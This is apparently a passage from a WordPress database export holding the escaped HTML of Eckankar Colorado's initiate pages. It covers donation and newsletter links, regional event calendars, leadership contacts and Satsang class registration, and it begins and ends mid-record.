col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234421,39836,'post_new_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.18)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.18)\" data-bg-overlaycolor-alpha=\"0.18\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK initiates who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241350,41022,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" 